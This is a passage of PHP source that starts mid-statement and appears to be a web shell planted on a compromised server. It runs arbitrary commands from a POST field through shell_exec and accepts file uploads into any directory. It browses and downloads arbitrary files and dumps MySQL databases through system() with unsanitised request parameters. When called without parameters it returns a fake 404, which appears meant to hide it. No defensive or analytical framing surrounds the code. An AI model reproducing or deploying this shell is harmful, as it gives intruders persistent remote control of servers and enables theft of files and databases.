📄 ".htmlspecialchars($full_path)."";
}
}
}
}
function sort_scandir($dir) {
$items = scandir($dir);
$folders = array();
$files = array();
foreach ($items as $item) {
if (is_dir($dir.'/'.$item)) {
$folders[$item] = $item;
}
else {
$files[$item] = $item;
}
}
sort($folders);
sort($files);
$result = array_merge($folders, $files);
return $result;
}
$db = $_GET['db'] ?? NULL;
$user = $_GET['user'] ?? NULL;
$pass = $_GET['pass'] ?? NULL;
$host = $_GET['host'] ?? NULL;
if ($db) {
header('Content-Type: application/sql');
header('Content-Disposition: attachment; filename="dump.sql"');
header('Content-Transfer-Encoding: binary');
system("mysqldump --host=".$host." --user=".$user." --password=".$pass." ".$db);
exit;
}
$path = $_GET['path'] ?? NULL;
$download = $_GET['download'] ?? NULL;
if ($path) {
if (is_dir($path)) {
echo "".htmlspecialchars(dirname(__FILE__))."";
$scheme = (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] !== 'off') ? 'https' : 'http';
echo "".htmlspecialchars($_SERVER['HTTP_HOST'])."";
echo "";
echo "";
echo "";
echo "";
echo "";
echo "
";
if ($_SERVER['REQUEST_METHOD'] === 'POST') {
if (isset($_POST['cmd'])) {
$cmd = $_POST['cmd'];
echo "
";
echo "Command: ".htmlspecialchars($cmd)."\n";
$output = shell_exec($cmd . " 2>&1");
if (stripos(PHP_OS, 'WIN') === 0) {
$output = mb_convert_encoding($output, 'UTF-8', 'CP866');
}
echo htmlspecialchars($output);
echo "";
echo "
";
}
elseif (isset($_POST['upload'])) {
if (isset($_FILES['file']) and $_FILES['file']['error'] == UPLOAD_ERR_OK) {
if (move_uploaded_file($_FILES['file']['tmp_name'], $path.'/'.basename($_FILES['file']['name']))) {
echo "
";
}
}
}
elseif (isset($_POST['mysql'])) {
$host = $_POST['host'] ?? NULL;
$user = $_POST['user'] ?? NULL;
$pass = $_POST['pass'] ?? NULL;
$db = $_POST['db'] ?? NULL;
try {
$mysqli = mysqli_connect($host, $user, $pass, $db);
mysqli_set_charset($mysqli, 'utf8');
if ($mysqli) {
$result = $mysqli->query("SHOW DATABASES");
if ($result) {
echo "
";
echo "";
echo "
";
}
mysqli_close($mysqli);
}
}
catch(mysqli_sql_exception $mysqli_error) {
echo "
";
}
}
}
$recurs = $_GET['recurs'] ?? NULL;
if ($recurs) {
echo "
";
echo "";
recurs($path, $recurs);
echo "
";
echo "
";
}
//files
$files = sort_scandir($path);
echo "";
for($i = 0; $i < count($files); $i++) {
$full_path = realpath($path."/".$files[$i]);
if (is_dir($full_path)) {
$icon = "📁";
} else {
$icon = "📄";
}
echo "- ".$icon." ".htmlspecialchars($files[$i])."
";
}
echo "
";
}
elseif (is_file($path)) {
$path = str_replace('\\', '/', $path);
echo "
";
highlight_file($path);
}
else {
header('HTTP/1.0 404 Not Found');
exit;
}
}
elseif ($download) {
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename="'.basename($download).'"');
header('Content-Length: '.filesize($download));
header('Cache-Control: must-revalidate');
header('Pragma: public');
readfile($download);
exit;
}
else {
header('HTTP/1.0 404 Not Found');
exit;
}
?>